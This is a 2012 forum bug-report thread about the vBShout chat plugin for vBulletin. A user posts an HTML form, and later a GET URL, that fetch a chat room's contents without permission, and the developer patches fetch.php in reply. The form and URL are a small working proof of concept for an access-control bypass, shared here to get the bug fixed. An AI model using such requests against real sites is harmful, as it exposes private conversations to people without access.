Bug Rooms can be seen by using an external form

post15951 · Sep 8, 2012

By using an external form like this:

Code:

<form action="http://www.nameOfSite.com/forum/vbshout.php" method="POST">
<input type="text" size="20" name="securitytoken" value=""><br> <!-- Security token can be found at the source of a website -->
<input type="hidden" size="7" name="do" value="ajax">
<input type="hidden" size="7" name="action" value="fetch">
<input type="hidden" size="7" name="tabs[shouts]" value="1">
<input type="hidden" size="7" name="tabs[activeusers]" value="1">
<input type="hidden" size="7" name="shoutorder" value="DESC">
<input type="hidden" size="7" name="pmtime" value="1345648479">
<input type="hidden" size="7" name="tabid" value="shouts">
<input type="hidden" size="7" name="type" value="chatroom_1_">
<input type="hidden" size="7" name="instanceid" value="1">
<input type=submit value="Show">
</form>

Content of the room to which a user doesn't have access can be retrieved

Fillip H. · Sep 8, 2012

That's pretty much a non-issue as far as I can tell - by default, vBulletin doesn't allow POST requests from domains other than those on your Whitelist.

That being said, I did make a change to /dbtech/vbshout/actions/ajax/fetch.php that might prevent this. You can re-download and re-upload it to see if it helps

post15951 · Sep 11, 2012

Your fix worked for POST but then again someone found another way to do it
http://example.com/forum/vbshout.ph...&action=fetch&shoutorder=DESC&type=chatroom_2
it will show the chat room xml even if you dont have permissions to see it

Fillip H. · Sep 11, 2012

Try re-uploading the same file again.

Bug Rooms can be seen by using an external form

post15951

New member

Fillip H.

post15951

New member

Fillip H.

Similar threads

Legacy vBShout

We value your privacy